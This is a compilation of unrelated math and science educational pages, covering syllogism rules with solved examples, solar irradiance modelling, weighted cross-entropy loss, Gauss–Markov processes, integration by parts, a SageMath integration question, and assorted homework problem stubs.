I. The Universal Positive: All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$
It states that every member of the first class is also a member of the second class. Take the statement "All Tamilians are Indians". It does not necessarily follow that all Indians are Tamilians. So 'Indians' is not distributed.
The general diagram for Universal Affirmative ‘All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$’ is
Immediate inference:
1. Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
2. Some $\mathop Y\limits^{\rm{\times}}$ are $\mathop X\limits^{\rm{\times}}$
II. The universal Negative: No $\mathop X\limits^{\rm{\surd}}$ is $\mathop Y\limits^{\rm{\surd}}$
It states that no member of the first class is a member of the second class. This proposition takes the form - No X is Y.
The general diagram for Universal Negative ‘No X is Y’ is
Immediate Inferences:
1. No $\mathop Y\limits^{\rm{\surd}}$ is $\mathop X\limits^{\rm{\surd}}$
2. Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s,
3. Some $\mathop Y\limits^{\rm{\times}}$ are not $\mathop X\limits^{\rm{\surd}}$’s
III. The Particular Affirmative: Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
It states that at least one member, but never all, of the class designated by the term 'X' is also a member of the class designated by the term 'Y'. This proposition takes the form Some Xs are Ys. The possible diagrams, as shown by Euler's circles, for this proposition are:
Immediate Inferences:
Some $\mathop Y\limits^{\rm{\times}}$ are $\mathop X\limits^{\rm{\times}}$
IV. The particular Negative: Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s.
It states that at least one member of the class designated by the term ‘X’ is excluded from the whole of the class designated by the term ‘Y’. This proposition takes the form Some Xs are not Ys. The Euler’s circle diagrams for this proposition are as follows.
Immediate Inferences: None
The shaded portion in each is that part of X that is not Y.
Most students wonder why "Y" is distributed here. Here is the explanation. Take the example statement "Some students are not hardworking", and say Rama is one of the students who is not hardworking. Then not even a single hardworking person can be Rama: the whole class of hardworking people is excluded from that part of the students. Since the statement says something about every hardworking person, 'hardworking' is distributed.
There are two methods to answer syllogisms.
1. Euler venn diagram method
2. Aristotle's rules Method
If all the statements are universal you can easily draw Venn diagrams and solve the questions. But if there are more particular statements, then you had better learn the Aristotle method. Although Aristotle's method initially seems a bit difficult to understand, once one practices a good number of questions, one can easily crack them.
Aristotle's Rules to solve syllogisms:
1. If both the statements are particular, no conclusion possible
(Explanation: Statements starting with "Some" are particular)
2. If both the statements are negative, no conclusion possible
3. If both the statements are positive, conclusion must be positive
4. If one statement is particular, conclusion must be particular
5. If one statement is negative, conclusion must be negative
6. Middle term must be distributed in at least one of the premises
(Explanation: Middle term is the common term between two given premises, and A terms is distributed means it must have the "$\checkmark$" mark above it)
7. If a term is distributed in the conclusion, the term must be distributed in at least one of the premises.
(Explanation: if any term has a check mark in the conclusion, that term must have a check mark in at least one of the given premises)
8. If a term is distributed in both the statements, only a particular conclusion is possible.
Solved Example 1:
Statements:
1: All MBAs are Graduates
2: All Graduates are Students
Conclusions:
1: All MBAs are Students
2: Some Students are MBAs
Explanation:
Statement 1: All $\mathop {{\rm{MBA}}}\limits^{\rm{\surd}}$s are $\mathop {{\rm{Graduates}}}\limits^{\rm{\times}}$
Statement 2: All $\mathop {{\rm{Graduates}}}\limits^{\rm{\surd}}$ are $\mathop {{\rm{Students}}}\limits^{\rm{\times}}$
C1: All $\mathop {{\rm{MBA}}}\limits^\surd$ are $\mathop {{\rm{students}}}\limits^{\rm{\times}}$
C2: Some $\mathop {{\rm{Students}}}\limits^\times$ are $\mathop {{\rm{MBA}}}\limits^{\rm{\times}}$
Now let us apply the rules:
1. Both statements are positive, so the conclusion must be positive.
2. The common (middle) term is Graduates, and it has a check mark in the second statement.
Conclusion 1: MBA in the conclusion has a check mark, so it must have a check mark in at least one of the premises; MBA in S1 has a check mark. It satisfies all the rules, so it is a valid conclusion.
Conclusion 2: No term in the conclusion has a check mark, so there is nothing further to check. It follows all the rules, so it is a valid conclusion.
Solved Example 2:
Statements:
All Cats are Dogs
No Dog is Fish
Conclusions:
1. No Cat is Fish
2. Some Cats are Fish
Explanation:
S1: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Dogs}}}\limits^\chi$
S2: No $\mathop {{\rm{Dog}}}\limits^\surd$ is $\mathop {{\rm{Fish}}}\limits^\surd$
C1: No $\mathop {{\rm{Cat}}}\limits^\surd$ is $\mathop {{\rm{Fish}}}\limits^\surd$
C2: Some $\mathop {{\rm{Cats}}}\limits^\chi$ are $\mathop {{\rm{Fish}}}\limits^\chi$
Now let us apply the rules:
1. S2 is negative, so the conclusion must be negative. C2 is therefore ruled out, since the rule says that if one statement is negative, the conclusion must be negative.
2. The common term is Dog, and it has a check mark in both premises.
Conclusion 1: In the conclusion, both terms Cat and Fish have check marks, and each has a check mark in at least one of the premises. So Conclusion 1 is valid.
Conclusion 2: As one of the premises is negative, the conclusion must be negative. So this conclusion is not valid.
Solved Example 3:
Statements:
Some books are toys.
No toy is red.
Conclusions:
1. Some toys are books.
2. Some books are not red.
Explanation:
S1: Some $\mathop {{\rm{Books}}}\limits^\chi$ are $\mathop {{\rm{Toys}}}\limits^\chi$
S2: No $\mathop {{\rm{Toy}}}\limits^\surd$ is $\mathop {{\rm{Red}}}\limits^\surd$
C1: Some $\mathop {{\rm{Toys}}}\limits^\chi$ are $\mathop {{\rm{Books}}}\limits^\chi$
C2: Some $\mathop {{\rm{Books}}}\limits^\chi$ are not $\mathop {{\rm{Red}}}\limits^\chi$
We can easily draw Conclusion 1, as it is an immediate inference from Statement 1.
Now apply the rules:
Statement 2 is negative, so the conclusion must be negative, and the middle term "Toy" must have a $\surd$ mark; it has one in Statement 2. Also, if a term has a $\surd$ mark in the conclusion it should have a $\surd$ mark in at least one of the statements: here "Red" has a $\surd$ mark in the conclusion and also in Statement 2.
So Conclusion 2 also follows all the rules.
Both conclusions are valid.
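Rules 1–7 above can be encoded in a short script. This is only a sketch: rule 8 and immediate inferences are not covered, and the tuple encoding of propositions is an assumption of the example.

```python
# Encode a proposition as (form, subject, predicate), with the four forms
#   "A": All S are P        "E": No S is P
#   "I": Some S are P       "O": Some S are not P

NEGATIVE = {"E", "O"}
PARTICULAR = {"I", "O"}

def distributed(prop):
    """Terms carrying a check mark, per the table in the text."""
    form, s, p = prop
    return {"A": {s}, "E": {s, p}, "I": set(), "O": {p}}[form]

def follows(p1, p2, conclusion):
    """Apply rules 1-7 to a two-premise syllogism."""
    forms = (p1[0], p2[0])
    # Rules 1 and 2: two particular or two negative premises -> no conclusion
    if all(f in PARTICULAR for f in forms) or all(f in NEGATIVE for f in forms):
        return False
    # Rules 3 and 5: the conclusion is negative exactly when one premise is
    if (conclusion[0] in NEGATIVE) != any(f in NEGATIVE for f in forms):
        return False
    # Rule 4: a particular premise forces a particular conclusion
    if any(f in PARTICULAR for f in forms) and conclusion[0] not in PARTICULAR:
        return False
    prem_dist = distributed(p1) | distributed(p2)
    # Rule 6: the middle term (shared by the premises, absent from the
    # conclusion) must be distributed at least once
    middle = ({p1[1], p1[2]} & {p2[1], p2[2]}) - {conclusion[1], conclusion[2]}
    if not (middle & prem_dist):
        return False
    # Rule 7: a term distributed in the conclusion must be distributed
    # in at least one premise
    return distributed(conclusion) <= prem_dist

# Solved Example 2: All Cats are Dogs; No Dog is Fish
p1, p2 = ("A", "cat", "dog"), ("E", "dog", "fish")
print(follows(p1, p2, ("E", "cat", "fish")))   # True:  No Cat is Fish
print(follows(p1, p2, ("I", "cat", "fish")))   # False: Some Cats are Fish
```

Note that an immediate inference such as Conclusion 1 of Solved Example 3 is drawn from a single statement, so it is not judged by this two-premise checker.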
Three Statement Types:
We can apply all the rules we learnt above while solving three-statement questions too. Look at the conclusions and see from which two statements their terms are derived. If one term comes from the first statement and the other from the third, we have to check that both middle terms have a $\checkmark$.
Solved Example 4:
Statements:
All cats are dogs
some pigs are cats.
All dogs are tigers
Conclusions:
some tigers are cats
some pigs are tigers
all cats are tigers
some cats are not tigers
1. Only 1 and 2
2. Only 1, 2 and 3
3. All follow
4. None Follow
Explanation:
Let us rearrange for easy understanding.
S2: Some $\mathop {{\rm{Pigs}}}\limits^\chi$ are $\mathop {{\rm{Cats}}}\limits^\chi$
S1: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Dogs}}}\limits^\chi$
S3: All $\mathop {{\rm{Dogs}}}\limits^\surd$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C1: Some $\mathop {{\rm{Tigers}}}\limits^\chi$ are $\mathop {{\rm{Cats}}}\limits^\chi$
C2: Some $\mathop {{\rm{Pigs}}}\limits^\chi$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C3: All $\mathop {{\rm{Cats}}}\limits^\surd$ are $\mathop {{\rm{Tigers}}}\limits^\chi$
C4: Some $\mathop {{\rm{Cats}}}\limits^\chi$ are not $\mathop {{\rm{Tigers}}}\limits^\chi$
From statements 1 and 3, "All Cats are Tigers" is correct, as Dogs has a $\surd$ mark. So conclusion 3 is correct. From the same pair, "Some Tigers are Cats" is also true, so conclusion 1 is correct.
Pigs is from the 2nd statement and Tigers is from the 3rd statement. If you observe our rearranged statements, Cats has a $\surd$ mark across the second and first statements, and Dogs has a $\surd$ mark across the first and third statements. So we can conclude that Some Pigs are Tigers, and conclusion 2 is correct.
All the given statements are positive, so the conclusion must be positive, and conclusion 4 does not follow. Hence option 2 is correct.
# proportion of solar radiation that reaches the earth surface
I have been following the methods suggested by members of this site to calculate the solar irradiance outside of the earth's atmosphere, see here.
I now want to calculate the solar irradiance reaching the earth's surface.
I calculate the irradiance outside the atmosphere as:
$$L_{\lambda} = \frac{2c^{2}h}{\lambda^{5}\left( \exp\left[hc/\lambda kT \right] - 1\right)}$$
where $h = 6.626\times 10^{-34}\ \mathrm{J\,s}$,
$c = 3 \times 10^{8}\ \mathrm{m\,s^{-1}}$,
$T = 6000\ \mathrm{K}$,
$k = 1.38066\times 10^{-23}\ \mathrm{J\,K^{-1}}$,
and $\lambda$ runs from $0$ to $3200 \times 10^{-9}\ \mathrm{m}$ in steps of $20 \times 10^{-9}\ \mathrm{m}$.
I then convert the units from per metre to per nanometre: $$L_{\lambda} =L_{\lambda} \times 10^{-9}$$
multiply by the square of the ratio of the solar radius to the earth's orbital radius $$L_{\lambda} =L_{\lambda} \times 2.177 \times 10^{-5}$$
apply Lambert's cosine law $$L_{\lambda} =L_{\lambda} \times \pi$$
which results in the upper curve seen in the following figure, i.e. the energy curve for a black body at 6000K:
I now wish to generate a second curve, one that shows the irradiance at the earth's surface. I know that the scattering and absorption processes that take place in the atmosphere not only reduce the intensity but also change the spectral distribution of the direct solar beam.
I want to show the spectral distribution of solar irradiance at sea level for a zenith sun and a clear sky. So, the curve that I want to show is the spectral distribution as it would be if there were scattering but no absorption. For this I would also like to make the assumption that the solar elevation is more than 30 degrees.
Does anyone know how I could produce the curve explained above?
• Find someone who has a copy of MODTRAN :-) . The quality of your result will depend on the details of your model. For example, you could limit it to Rayleigh scattering plus $H_2O$ absorption. Jun 4 '14 at 13:46
This is getting complicated. :) You have to make a lot of assumptions to make progress; you have listed most of them. I'll explicitly add an assumption that we consider only Rayleigh scattering (more-or-less consistent with "clear sky"), and that the atmosphere is pure N${}_2$.
Since this is homework, I won't spill all the beans.
What you need is the cross section for Rayleigh scattering: how much light does each molecule remove from the incident light. Given that, then you have to figure out what to do with it. This will involve figuring out how many molecules are in the way between the Sun and your detector.
I will say that there are web sites that present the results you need without your having to do the calculations yourself.
Of course, this won't give you any of the absorption bands that show up in your chart. And, of course, it won't account for the fact that the light hitting the top of the atmosphere only approximately follows the black body curve. I haven't done the exercise myself, but I suspect you will end up reproducing one of the main features of those data.
Update
Since we're beyond homework: this Wikipedia page gives the Rayleigh scattering cross section for N${}_2$, and a value for molecular density, but it doesn't say if it's the average value or the value at the earth's surface. Nonetheless, that number can help in making order-of-magnitude estimates. At any rate, Rayleigh scattering goes as $\lambda^{-4}$, so when you take that into account you will multiply your result by $a\lambda^{-4}$, where $a$ is some pre-factor that you don't know yet. You can try to make an estimate of the pre-factor using the data on that Wikipedia page, and perhaps some knowledge or guesses about the thickness of the atmosphere. (Or you can simply try different values for $a$ until you find one that works.) You might be able to model the fact that the solar data matches the b.b. curve for high frequencies, but not at lower frequencies.
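Putting the pieces together, a sketch of the whole calculation might look like the following. The Beer–Lambert attenuation with Rayleigh optical depth $\tau_R \approx 0.008569\,\lambda_{\mu m}^{-4}$ is my own assumption here (a common clear-sky approximation), not something from the thread:

```python
import numpy as np

# Planck spectral radiance, scaled to irradiance at the top of the
# atmosphere exactly as in the question: convert to per-nm, multiply by
# the squared radius/orbit ratio (~2.177e-5), apply Lambert's cosine law.
h, c, k = 6.626e-34, 3.0e8, 1.38066e-23
T = 6000.0
lam = np.arange(20e-9, 3200e-9, 20e-9)           # wavelength grid [m]

L = 2 * c**2 * h / (lam**5 * (np.exp(h * c / (lam * k * T)) - 1))
E_toa = L * 1e-9 * 2.177e-5 * np.pi              # W m^-2 nm^-1 at TOA

# Clear-sky, zenith-sun (airmass m = 1), Rayleigh-scattering-only
# transmission via Beer-Lambert.  tau_R ~ 0.008569 * lam_um^-4 is an
# assumed approximation for a vertical path through the atmosphere.
lam_um = lam * 1e6
tau_R = 0.008569 * lam_um**-4
E_surface = E_toa * np.exp(-tau_R)               # irradiance at sea level
```

The short-wavelength end is attenuated far more strongly than the long-wavelength end, which reproduces the general shape of the surface curve (but, as noted in the answer, none of the absorption bands).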
• Thanks. Just to clarify, this is not actually homework (way past that stage), it just seemed like a relevant tag. Jun 4 '14 at 13:57
• what about the m = 1 part specified on the graph? Jun 4 '14 at 22:11
• I'm not sure, but I'm thinking that you might be able to reproduce the general outline of that curve. (Again, you won't be able to get the features that occurred before the light gets to the earth, and the absorption features from the atmosphere.) Jun 5 '14 at 0:23
• Is there a table somewhere that shows the percentage of spectral energy per wavelength band e.g. PAR constitutes 45 % of the energy at earth's surface and so on... Jun 5 '14 at 7:21
• Excuse my ignorance, but what is PAR? Jun 5 '14 at 11:51 |
# Binary cross entropy vs mse loss function when asymmetric payoffs
I'm building a binary classifier that has an unequal payoff given the following cases:
• $Y_{pred}=Y_{actual}=\text{True}$: payoff is $+x \cdot 100$
• $Y_{pred}\ne Y_{actual}=\text{True}$: payoff is $-x \cdot 100$
• $Y_{pred}\ne Y_{actual}=\text{False}$: payoff is $-1$
• $Y_{pred}=Y_{actual}=\text{False}$: payoff is $+1$
In other words, there are two possible courses of action: True for action 1 and False for action 2.
I'm looking at two approaches to implement it:
1. I could use MSE as the loss function with two output neurons, assign the payoffs directly to $Y_{actual}$, with the neural network predicting the payoffs for each of the actions.
• I assume I would then just look for which of the two neurons predicts a higher payoff and use a linear function in the last activation layer. Correct?
2. I could create a custom loss function that will calculate the respective payoffs as described above and then use binary cross entropy on that?
Which of those two approaches would be preferred? Should they lead to the same result, giving a recommendation for each sample which action is preferable?
You cannot use your "payoff" function as a loss for your network because it is not differentiable. Instead, you can use a differentiable function which has outputs close to your evaluation metric (payoff).
As you are predicting a binary variable, the way to go is the binomial cross-entropy. The loss function would look like:
$$\mathcal{L}(\mathbf y, \mathbf c, \mathbf t)=-\frac {1}{N}\sum_n \left[100c_n t_n\log y_n + (1-t_n)\log (1-y_n)\right],$$
where $\mathbf y$ are the predictions, $\mathbf t$ are the targets and $\mathbf c$ are the individual costs for each sample. You can see it is giving the false negative predictions $100c_n$-times higher penalty than false positives.
It is possible that you will have to implement this loss yourself, but it should be quite easy.
Using MSE for classification does not make much sense.
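The loss above is easy to write by hand. A minimal NumPy sketch (framework-agnostic, useful for checking values rather than training; the function name and defaults are mine):

```python
import numpy as np

def weighted_bce(y, t, c, fn_weight=100.0):
    """Weighted binary cross-entropy as in the answer above: positive
    targets (t = 1) are penalized with weight fn_weight * c_n, negative
    targets with weight 1.  y are predicted probabilities in (0, 1)."""
    eps = 1e-12                          # avoid log(0)
    y = np.clip(y, eps, 1.0 - eps)
    return -np.mean(fn_weight * c * t * np.log(y)
                    + (1.0 - t) * np.log(1.0 - y))

# A confident mistake on a positive sample is punished 100x harder than
# the mirror-image mistake on a negative sample:
pos_miss = weighted_bce(np.array([0.1]), np.array([1.0]), np.array([1.0]))
neg_miss = weighted_bce(np.array([0.9]), np.array([0.0]), np.array([1.0]))
```

For training, the same expression can be reimplemented in the framework of your choice, as the comments below discuss for TensorFlow.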
• In my case each sample would need to have an individual weight. Also, cross entropy with weights only seems to offer a coefficient for positive cases - unclear to me what that means as I have basically 4 different payoffs that need to be weighted. – Nickpick Feb 7 '18 at 23:28
• What is "x" in your "payoff"? The weight coefficient for each sample? – Jan Kukacka Feb 8 '18 at 10:40
• Yes that's correct. So I would need the samples weighted but also dependent on the outcome (if correctly matched or not). – Nickpick Feb 8 '18 at 10:43
• Check the updated answer. Hope it solves your problem. – Jan Kukacka Feb 8 '18 at 11:01
• I guess not, but you can use the tensorflow sigmoid_cross_entropy_with_logits source code and modify it for your purpose. – Jan Kukacka Feb 8 '18 at 12:08 |
# Gauss–Markov process
Not to be confused with the Gauss–Markov theorem of mathematical statistics.
Gauss–Markov stochastic processes (named after Carl Friedrich Gauss and Andrey Markov) are stochastic processes that satisfy the requirements for both Gaussian processes and Markov processes.[1][2] The stationary Gauss–Markov process is a very special case because it is unique, except for some trivial exceptions.
Every Gauss–Markov process X(t) possesses the three following properties:
1. If h(t) is a non-zero scalar function of t, then Z(t) = h(t)X(t) is also a Gauss–Markov process
2. If f(t) is a non-decreasing scalar function of t, then Z(t) = X(f(t)) is also a Gauss–Markov process
3. There exists a non-zero scalar function h(t) and a non-decreasing scalar function f(t) such that X(t) = h(t)W(f(t)), where W(t) is the standard Wiener process.
Property (3) means that every Gauss–Markov process can be synthesized from the standard Wiener process (SWP).
## Properties of the stationary Gauss–Markov processes
A stationary Gauss–Markov process with variance $\textbf{E}(X^{2}(t)) = \sigma^{2}$ and time constant $\beta^{-1}$ has the following properties.
Exponential autocorrelation:
$\textbf{R}_{x}(\tau) = \sigma^{2}e^{-\beta |\tau|}.\,$
A power spectral density (PSD) function that has the same shape as the Cauchy distribution:
$\textbf{S}_{x}(j\omega) = \frac{2\sigma^{2}\beta}{\omega^{2} + \beta^{2}}.\,$
(Note that the Cauchy distribution and this spectrum differ by scale factors.)
The above yields the following spectral factorization:
$\textbf{S}_{x}(s) = \frac{2\sigma^{2}\beta}{-s^{2} + \beta^{2}} = \frac{\sqrt{2\beta}\,\sigma}{(s + \beta)} \cdot\frac{\sqrt{2\beta}\,\sigma}{(-s + \beta)}.$
which is important in Wiener filtering and other areas.
There are also some trivial exceptions to all of the above.
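The exponential autocorrelation can be checked numerically. The sketch below (parameters are my own choice) simulates the stationary process by exact discretization of the Ornstein–Uhlenbeck recursion, which reproduces $\mathbf{R}_x(\tau) = \sigma^2 e^{-\beta|\tau|}$:

```python
import numpy as np

# Exact discretization of the stationary Gauss-Markov (Ornstein-Uhlenbeck)
# process: X_{k+1} = r X_k + sqrt(sigma^2 (1 - r^2)) W_k with r = exp(-beta dt),
# started in the stationary law X_0 ~ N(0, sigma^2).
rng = np.random.default_rng(0)
sigma, beta, dt, n = 1.0, 2.0, 0.01, 400_000

r = np.exp(-beta * dt)
x = np.empty(n)
x[0] = rng.normal(0.0, sigma)
noise = rng.normal(0.0, sigma * np.sqrt(1.0 - r**2), n - 1)
for k in range(n - 1):
    x[k + 1] = r * x[k] + noise[k]

# Empirical autocovariance at lag tau vs. the theoretical sigma^2 exp(-beta tau).
lag = 50                                  # tau = lag * dt = 0.5
emp = np.mean(x[:-lag] * x[lag:])
theory = sigma**2 * np.exp(-beta * lag * dt)
```

With these parameters the empirical lag-$0.5$ autocovariance comes out close to $e^{-1} \approx 0.368$, as the exponential form predicts.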
## See also
Ornstein–Uhlenbeck process
## References
1. ^ C. E. Rasmussen & C. K. I. Williams, (2006). Gaussian Processes for Machine Learning. MIT Press. p. Appendix B. ISBN 026218253X.
2. ^ Lamon, Pierre (2008). 3D-Position Tracking and Control for All-Terrain Robots. Springer. pp. 93–95. ISBN 978-3-540-78286-5. |
# zbMATH — the first resource for mathematics
Decidability of definability. (English) Zbl 1327.03008
Let a structure of a finite relational signature be given. The authors study the decidability of the following algorithmic problem: given quantifier-free formulas $$\phi_0,\phi_1,\ldots,\phi_n$$ of its language, decide whether one can find a primitive positive formula, using $$\phi_1,\ldots,\phi_n$$ as basic predicates, that is equivalent to $$\phi_0$$ on this structure. A formula is called primitive positive if it is built from the basic predicates by means of conjunctions and existential quantifications only.
The main result of this paper is the proof of the decidability of this problem, as well as of some of its variations, under some restrictions: the structure must be ordered, homogeneous, Ramsey, and finitely bounded (see the definitions in the reviewed paper). An application of the main result is given, as well as an example showing that it is impossible to omit some of these restrictions on the structure. Some open problems are formulated.
##### MSC:
03B25 Decidability of theories and sets of sentences
03C40 Interpolation, preservation, definability
# By Parts Backstory
Here’s the simple concept behind integration by parts, as described in an earlier post. Integration by parts is simply what I call the reverse product rule. Here’s why.
Let $u$ and $v$ be functions of $x$. Using product rule, when we differentiate $uv$, we differentiate the first term *times* keep the second constant *plus* differentiate the second term *times* keep the first constant. That is,
$\displaystyle \frac{d}{dx} \left(uv\right)=\frac{du}{dx} v + u \frac{dv}{dx}$.
Notationally, since $u'=\displaystyle\frac{du}{dx}$ and $v'=\displaystyle\frac{dv}{dx}$, we rewrite the above identity as
$\displaystyle \frac{d}{dx} \left(uv\right)=u'v + uv'$.
Let’s integrate with respect to $x$ on both sides. On the LHS, we are integrating what we get after differentiating. Since they cancel each other out, we get $uv$ on the LHS. On the RHS, we get the integrals of each chunk added together, that is,
$\displaystyle uv = \int u'v\ dx + \int uv'\ dx$.
Subtracting by $\displaystyle \int u'v\ dx$ on both sides and switching the LHS with the RHS, we get
$\displaystyle \int uv' \ dx = uv - \int u'v\ dx$,
which is the famous integration by parts formula.
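As a quick sanity check of the formula (my own example, not from the original post), take $u = x$ and $v' = e^x$, so that $u' = 1$ and $v = e^x$:

```latex
% Integration by parts with u = x, v' = e^x (so u' = 1, v = e^x):
\int x e^x \, dx = x e^x - \int 1 \cdot e^x \, dx = x e^x - e^x + C
```

Differentiating $x e^x - e^x$ with the product rule gives back $x e^x$, closing the loop.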
Hope this was insightful on how this technique is nothing more than reversing the product rule! |
# definite integral returns error but indefinite followed by equivalent subtraction does not
Searching the other questions on definite integrals I did not find the same issue, maybe I missed it. I use SageMath 9.2
When I define these variables:
var('x,y', domain='real')
var('c,p_i', domain='positive')
f_x_pi = 1/5*(3*c - 0.06)*(0.2969*sqrt(x/(c - 0.02)) - 0.126*x/(c - 0.02) - 0.3516*x^2/(c - 0.02)^2 + 0.2843*x^3/(c - 0.02)^3 - 0.1036*x^4/(c - 0.02)^4)
c_i_u = c - 0.02
This:
I = integrate(integrate((x^2+y^2),y,-f_x_pi,f_x_pi),x,0,c_i_u)
return a Maxima requested additional constraints error but this:
I_indef = integrate(integrate((x^2+y^2),y,-f_x_pi,f_x_pi),x)
I = I_indef(x=c_i_u) - I_indef(x=0)
or relying on algorithm='sympy', which is slower, does not.
I am wondering if that's a bug and whether I should report it.
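A much smaller example reproduces the same behaviour. The sketch below is my own minimal illustration (not the integral from the question, and using SymPy rather than Maxima): a definite integral whose bound appears under a square root only evaluates cleanly once the sign of the bound is declared.

```python
import sympy as sp

# A bound that appears under a square root: integrate sqrt(x/c) on [0, c].
# Declaring c > 0 pins down the branch the CAS would otherwise ask about.
x = sp.symbols('x')
c = sp.symbols('c', positive=True)

result = sp.integrate(sp.sqrt(x / c), (x, 0, c))   # equals 2c/3 for c > 0
```

Without the `positive=True` assumption the integrand's square root is ambiguous in sign, which is exactly the kind of situation where Maxima stops and requests additional constraints.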
Having floating-point constants makes it extremely difficult to grasp the structure of the integration bounds. Furthermore, this introduces some absurdities:
sage: bool((c-0.02)==(3*c-0.06))
False
So we replace them :
# Problem data :
var('x,y', domain='real')
var('c,p_i', domain='positive')
f_x_pi = 1/5*(3*c - 0.06)*(0.2969*sqrt(x/(c - 0.02)) - 0.126*x/(c - 0.02) - 0.3516*x^2/(c - 0.02)^2 + 0.2843*x^3/(c - 0.02)^3 - 0.1036*x^4/(c - 0.02)^4)
c_i_u = c - 0.02
# Laziness : find and replace the floating point constants
def GetNums(expr):
    if expr.operator() is None:
        if expr.is_numeric():
            return set([expr])
        return set()
    return reduce(union, list(map(GetNums, expr.operands())))
L = [u for u in GetNums(f_x_pi) if not u.is_integer()]
# Keep the rationals and 0.02 (see above)
L.remove(1/2)
L.remove(1/5)
D = dict(zip(L, [var("c_{}".format(u)) for u in range(len(L))]))
# Bounds of the inner integration :
D1 = copy(D)
var("c_7")
D1.update({c-0.02:c_7,3*c-0.06:3*c_7})
foo = f_x_pi.subs(D1)
Now, we can compute an exact symbolic form of your expression. The computation of the outer integral by Maxima is indeed hypothesis-dependent :
sage: %time with assuming(c_7>0): Intp = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7).subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 362 ms, sys: 12 ms, total: 374 ms
Wall time: 269 ms
sage: Intp
379461086555604037/20207687500000000000*c^4 - 379461086555604037/252596093750000000000*c^3 + 1138383259666812111/25259609375000000000000*c^2 - 379461086555604037/631490234375000000000000*c + 379461086555604037/126298046875000000000000000
sage: %time with assuming(c_7<0): Intn = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7).subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 307 ms, sys: 8.02 ms, total: 315 ms
Wall time: 262 ms
But those expressions are equal :
sage: bool(Intp==Intn())
True
Computation via Sympy is much slower but doesn't need hypotheses :
sage: %time Ints = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7, algorithm="sympy").subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 12.4 s, sys: 68 ms, total: 12.5 s
Wall time: 12.5 s
and leads to the same value :
sage: bool(Intp==Ints)
True
This is not a bug: Maxima and Sympy use different algorithms (that's the whole point of having them both in Sage...). The algorithm used by Maxima depends on hypotheses on the sign of c-0.02, which appears in a square root in the integration bounds. The expressions obtained in the two cases happen to be equal.
FWIW: another case can be seen when solving the differential equation a*f(x).diff(x,2)+b*f(x).diff(x)+c*f(x)+d==0 for f(x): Maxima will request a hypothesis on the sign of b^2-4*a*c, and its answer will be the difference of two exponentials if positive and the sum of two cos functions of x if negative (both multiplied by an exponential function of x). These answers turn out to be identical up to an application of de Moivre's formula, as well as being equal to the (exponentially-expressed, IIRC) answer given by Sympy. Again, that's not a bug, just different ways to reach or express the same result.
HTH,
more |
# Que 3 A bandpass signal g(t) of bandwidth B Hz centered at...
###### Question:
Que 3: A bandpass signal g(t) of bandwidth B Hz centered at $f = 10^4$ Hz is passed through the RC filter in Example 3.16 (Fig. 3.26a) with $RC = 10^{-3}$. If, over the passband, a variation of less than 2% in amplitude response and less than 1% in time delay is considered to be distortionless transmission, determine the maximum allowable value of bandwidth B for g(t) to be transmitted through this RC filter without distortion.
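Taking the centre frequency as $f = 10^4$ Hz (my reading of the problem text), the band can be found numerically. This is a sketch of one way to attack the problem, not the textbook's solution:

```python
import numpy as np

# Find the widest band around fc over which a first-order RC low-pass is
# "distortionless" per the stated tolerances (amplitude variation < 2%,
# time-delay variation < 1%).  fc = 1e4 Hz is an assumed reading of the
# problem statement.
RC, fc = 1e-3, 1e4

def amp(f):
    """Magnitude response |H(f)| of the RC low-pass."""
    return 1.0 / np.sqrt(1.0 + (2 * np.pi * f * RC) ** 2)

def delay(f):
    """Group delay t_d = -d(theta)/d(omega) = RC / (1 + (omega RC)^2)."""
    w = 2 * np.pi * f
    return RC / (1.0 + (w * RC) ** 2)

def variation(fn, B):
    """Peak-to-peak variation over [fc - B/2, fc + B/2], relative to fc."""
    f = np.linspace(fc - B / 2, fc + B / 2, 2001)
    v = fn(f)
    return (v.max() - v.min()) / fn(np.array([fc]))[0]

candidates = [B for B in range(10, 1001, 10)
              if variation(amp, B) < 0.02 and variation(delay, B) < 0.01]
B_max = max(candidates)
```

With these numbers the 1% delay tolerance, not the 2% amplitude tolerance, turns out to be the binding constraint.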
#### Similar Solved Questions
##### In the figure below the two blocks are connected by a string of negligible mass passing over a frictionless pulley. m1 = 10.0 kg and m2 = 6.70 kg and the angle of the incline is θ = 39.0°. Assume that the incline is smooth. (Assume the +x direction is down the incline of the plane.)(a)With what acceleration (in m/s2) does the mass m2 move on the incline surface? Indicate the direction with the sign of your answer. m/s2(b)What is the tension in the string in newtons? N(c)For what value of m1
##### The wave of action potentials will travel in both direction( to left to right ) true...
##### Using either the molar volume at STP or the ideal gas law equation (whichever is appropriate), determine the molar mass (g/mol) of each of the following: 11.6 g of a gas that has a volume of 2.00 L at STP; 0.726 g of a gas that has a volume of 855 mL at 1.20 atm and 18 °C; 2.32 g of a gas that has a volume of ... at 685 mmHg and 25 °C
##### How do you find the remaining trigonometric ratios if sectheta= -1.5 and pi/2 < theta< pi?
##### John has a 25 gallon fish tank
John has a 25 gallon fish tank. John filled his fish tank today with 24 gallons of water. The water evaporates at a rate of 1.5 gallons per week. John adds 2 gallons to the tank every other week. At which of the following times will the tank contain 17.5 gallons? (a) exactly 11 weeks from today, (b) ...
##### Evaluate the following definite integrals (each worth equal marks).
##### What is the oxidation number of Copper in CuOH+
##### If a water electrolysis cell operates at a current of 7.8 $\mathrm{A}$ , how long will it take to generate 25.0 L of hydrogen gas at a pressure of 25.0 atm and a temperature of $25^{\circ} \mathrm{C} ?$
